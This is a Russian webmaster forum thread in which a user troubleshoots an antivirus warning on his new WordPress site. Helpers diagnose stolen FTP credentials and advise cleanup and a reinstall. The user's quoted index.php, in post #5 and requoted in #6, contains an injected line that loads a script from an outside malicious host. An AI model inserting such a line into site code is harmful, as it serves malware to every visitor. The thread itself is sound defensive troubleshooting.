Вирус на сайте

12
Ingvarr
На сайте с 26.04.2009
Offline
452
1130

На днях решил попробовать сделать сайт на WordPress. Установил на домене http://igor.net.ru/ движек, поставил несколько плагинов. А вчера случайно зашел не со своего компьютера туда.

И вот что увидел

Как удалить этот вирус и откуда он мог там взяться?

dendav
На сайте с 18.03.2010
Offline
51
#1

А сам движок и плагины откуда брали? Надёжное место?

Слишком много вариантов, чтобы что-то предполагать. На рабочей машине вирусов нет? Файлзиллой не пользуетесь? Сейчас участились случаи кражи паролей от фтп через фтп-менеджеры. Может быть хостер дырявый или сам движок/плагин/тема.

Ingvarr
На сайте с 26.04.2009
Offline
452
#2
dendav:
А сам движок и плагины откуда брали? Надёжное место?

Движек входил в список движков, которые можно было устанавливать на хостинге. Я просто выбрал этот движек из списка и нажал установить.

---------- Добавлено 12.05.2012 в 00:07 ----------

Плагины выбирал в админке вордпреса. А откуда они там скачиваются?

---------- Добавлено 12.05.2012 в 00:08 ----------

На рабочей машине вирусы не обнаружены. Пользовался тотал командером.

Creative Team
На сайте с 23.04.2012
Offline
17
#3

Ftp пользововались через тотал командер? Скорее всего у вас украли логин и пароль ftp! Такое часто бывает.

Первым делом закройте доступ по фтп, потом посмотрите индексный файл, скорее всего там вредоносный код прописан.

Помогу избавиться от вирусов, шеллов, айфреймов, скрытых ссылок и всякой нечисти на ваших сайтах (/ru/forum/835493)
dendav
На сайте с 18.03.2010
Offline
51
#4
Ingvarr:
Движек входил в список движков, которые можно было устанавливать на хостинге. Я просто выбрал этот движек из списка и нажал установить. Плагины выбирал в админке вордпреса. А откуда они там скачиваются?

Может хостер ставит какую-то старую версию Вордпресса? Сейчас актуальна, кажись, версия 3.3.2. Может проще проверить свой комп на наличие врагов способных увести пароли от фтп или админки движка, да качнуть и поставить свежий двиг с оф. сайта?

Ingvarr
На сайте с 26.04.2009
Offline
452
#5
Creative Team:
потом посмотрите индексный файл

Вот его содержание:

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
echo '<script src="http://static.homedns.org/rss.js"></script>';
?>
Prosto Digital
На сайте с 25.09.2010
Offline
321
#6
Ingvarr:
echo '<script src="http://static.homedns.org/rss.js"></script>';

в стандартном индексе такого нет =)

Обучение арбитражу трафика. Affiliate marketing education. https://prosto.digital.tilda.ws/
Ingvarr
На сайте с 26.04.2009
Offline
452
#7
Noctes:
в стандартном индексе такого нет =)

вот что мне попалось /ru/forum/comment/10383607

---------- Добавлено 12.05.2012 в 04:22 ----------

Удалил эту строчку, теперь осталось понять как она там очутилась.

Prosto Digital
На сайте с 25.09.2010
Offline
321
#8

Ingvarr, Если сборку вп качали не с офф сайта, лучше заново поставить офф версию.

Удалить(заменить) ненадёжные плагины.

Проверить файлы на наличие шелов, например айболитом(http://revisium.com/ai/)

Ingvarr
На сайте с 26.04.2009
Offline
452
#9
Noctes:
Ingvarr, Если сборку вп качали не с офф сайта

Я её вообще ниоткуда не качал, её хостинг предоставляет

---------- Добавлено 12.05.2012 в 04:37 ----------

Noctes:
Ingvarr,

Удалить(заменить) ненадёжные плагины.

Как определить какой плагин ненадежный?

---------- Добавлено 12.05.2012 в 04:42 ----------

Вот еще нашел http://opencartforum.ru/topic/8994-если-у-вас-не-работает-кнопка-купить-вирус-на-с/page__hl__вирус__fromsearch__1

Та же проблема и совсем недавно

Geers
На сайте с 12.04.2011
Offline
487
#10

ТС, расслабьтесь. :)

URL: mal - не вирус! Это сообщение антивируса, что данный веб-адрес (URL) заблокирован, потому что числится в его базе данных как вредоносный (malicious).

А именно этот адрес:

;)

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий